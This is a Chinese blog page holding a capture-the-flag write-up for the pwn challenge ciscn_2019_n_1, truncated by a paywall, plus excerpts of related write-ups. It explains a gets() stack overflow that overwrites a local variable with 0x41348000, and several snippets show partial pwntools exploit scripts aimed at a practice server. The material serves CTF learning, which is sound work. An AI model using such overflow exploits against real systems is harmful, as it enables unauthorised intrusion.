pwn——ciscn_2019_n_1#pwn1_sctf_2016#jarvisoj_level0

最新推荐文章于 2024-01-21 14:24:20 发布
最新推荐文章于 2024-01-21 14:24:20 发布
阅读量580 收藏
点赞数
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LSYZWF/article/details/120979561
版权

文章目录

ciscn_2019_n_1

题目

题目链接:https://buuoj.cn/challenges#ciscn_2019_n_1

解答

1、打开IDA进行分析
在这里插入图片描述
发现函数gets和系统命令cat
此函数的大致意思是输入v1的值,然后判断v2,故存在栈溢出使得v2的内存中的值为11.28125
2、判断偏移地址
在这里插入图片描述
v2的内存地址距离v1首地址的偏移量是30h-04h=2ch
3、gdb调试一波
在这里插入图片描述
没有堆栈溢出保护
4、编写脚本
11.28125的十六进制可以在IDA中查看
将鼠标光标放在相应指令上
在这里插入图片描述
点击跳转查看

在这里插入图片描述

from pwn import *
p = remote('node4.buuoj.cn',25698)
payload = 'a'*0x2c+p32(0x41348000
最低0.47元/天 解锁文章
DiliLearngent
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF—ciscn_2019_n_1 1
qq_41560595的博客
09-24 4355
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 625
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
[BUUCTF]PWN------ciscn_2019_n_1
BangSen1的博客
01-16 276
ciscn_2019_n_1 例行检查,64bit,NX保护开启 运行一下,没有信息 64位IDA打开,看到了cat flag ,跟进瞧瞧 函数显示 ,当v2等于11.28125时,得到flag,但要求 我们输入的是v1,所以我们只有把v1和v2 之间全部填满之后紧接着写入11.28125即可。 我们可以看到这两个之间的大小为0x2C 再将11.28125转换为内存中的16进制,结果为 0x41348000 摘自 exp 得到FLAG ...
[BUUCTF-pwn]——ciscn_2019_n_1
Y_peak的博客
01-31 1016
[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_1 题目: 老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出 在IDA中看一下,main函数里面没有什么可以利用的 双击func函数看看,就是我们想要的。 思路一 —— 覆盖局部变量
ciscn_2019_n_1
weixin_52034946的博客
01-15 444
检查,64位 ida查看 又是gets函数,思路来了,一直输入挤满栈,直到v2处输入11.28125 11.28125的16进制转换是 0x41348000h 脚本 from pwn import* r = remote(“node3.buuoj.cn”,29950) flag_addr = 0x41348000 payload = “a”*(0x30-0x4)+p64(flag_addr) r.sendline(payload) r.interactive() 0x30 - 0x4 就是v1到v2处的空
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2507
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
SCTF2021_Pwn_dataleak_WP
weixin_56434818的博客
12-27 710
SCTF2021_dataleak_WP 文章目录SCTF2021_dataleak_WP检查文件和保护ida查看ELF文件cJSON_PWNida查看libcjson.so利用思路exploit 检查文件和保护 64位小端序,动态链接。relro半开,没开canary,开了PIE和NX。 ida查看ELF文件cJSON_PWN int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int i; //
sctf_2019_easy_heap
fayinq的博客
04-20 278
sctf_2019_easy_heap 保护全开,所以又只能修改__malloc_hook,或者说__free_hook了。 函数分析: main函数 add函数 Free函数 Edit函数 下面的函数中有一个off-by-one的漏洞,所以我们可以很自然的想到overlap 思路 首先,程序在运行的时候泄露了一段Mmap的地址,至于给了一个地址,那一定是有用的东西,这里可以思考,是不是可以直接往里面写一段shellcode,然后把__free_hook或者说__malloc_hook改成前面的
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5257
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
2021_09_15_ciscn_2019_n_1
m0_51187558的博客
09-15 2799
ciscn_2019_n_1 前言 每日一题pwn方向的第二题。也是初入漏洞利用的一道特别基础的题。 大家都应该尝试着做过了上一道,也就是test your nc。从解法来说其实那道题的难度真的只是半脚踩在入门的门坎上。就像wp中所说的那样,目前pwn题的核心是通过漏洞挖掘与利用来提权,而nc这道题可以说是不需要任何漏洞的挖掘与利用,做出这道题并不代表你已经入门pwn了。 虽然如此,从ciscn_2019_n_1这道题开始,我们真正要开始尝试迈过pwn题的那一道门槛,面对一些简单的漏洞进行利用了。 做题流程
[每日一PWN]BUUCTF ciscn_2019_n_1
qq_55233040的博客
11-21 522
这道题双解,一种ret2text,另一种就是单纯的覆盖数据改变判断结果。
BUU ciscn_2019_n_1
xieyichensss的博客
03-19 399
**BUUOJ ciscn_2019_n_1** (今天来晚了,嘿嘿,出去唱歌了,被淋成落汤鸡) 1.老规矩,将其checksec和file一下,发现NX保护被打开了,且是64为的ELF文件。 2.那就放入IDA64内分析,按fn+F5查看c的代码,发现一个func()的函数,双击进入 cat flag直接映入眼帘,我tm直接暗喜,有后门函数了诶,那就不慌了,直接看c的代码。 3.要想将后门函数覆盖到返回地址,那就必须要v2=11.28125,可是又没有v2的gets函数,我们...
以题目:ciscn_2019_n_1来详细学习dbg和pwntools
最新发布
WdIg-2023的博客
01-21 1147
我们在做Linux平台下的pwn题目的时候,调试是必不可少的一步,在调试的过程中找到漏洞并用pwntools写出攻击脚本。
BUU CTF PWN ciscn_2019_n_1 WriteUp
m0sway的博客
02-28 238
BUU CTF PWNciscn_2019_n_1的WriteUp
[BUUCTF-PWN] ciscn_2019_n_1
m0_46098032的博客
01-04 274
下载文件,checksec看一下。 用IDA64打开文件,找到main函数,F5查看。 双击进去func函数。 输入的数传给v1,但是需要使v2=11.28125才能获得flag。我们查看一下v1和v2的栈信息。 因此我们可以利用gets先覆盖到v2的部分,再跟上11.28125的十六进制数即可成功获取flag。 11.28125的16进制为0x41348000。 exp如下: from pwn import * p = remote('node4.buuoj.cn',
BUUCTF_PWN - ciscn_2019_n_1
weixin_46009088的博客
12-06 339
BUUCTF_PWN - ciscn_2019_n_1 查看程序保护模式和文件基本信息 有个NX保护,如果要写shellcode有点麻烦,文件是64位小端程序(各条保护详情介绍请看胡写瞎写(1) pwntools常见命令) IDA载入 shift+F12寻找敏感字符串,发现一个cat /flag 查看该字符串的交叉引用: 查看该函数: 很明显这是通过栈溢出覆盖v2的值变成11.28125 拿到 flag 我们发现gets()并且v2是在 rsp + 2Ch,那就是说只要输入超过44个字符便可以覆盖.
jarvisoj_level1
08-28
很抱歉,我无法回答这个问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦](https://download.csdn.net/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值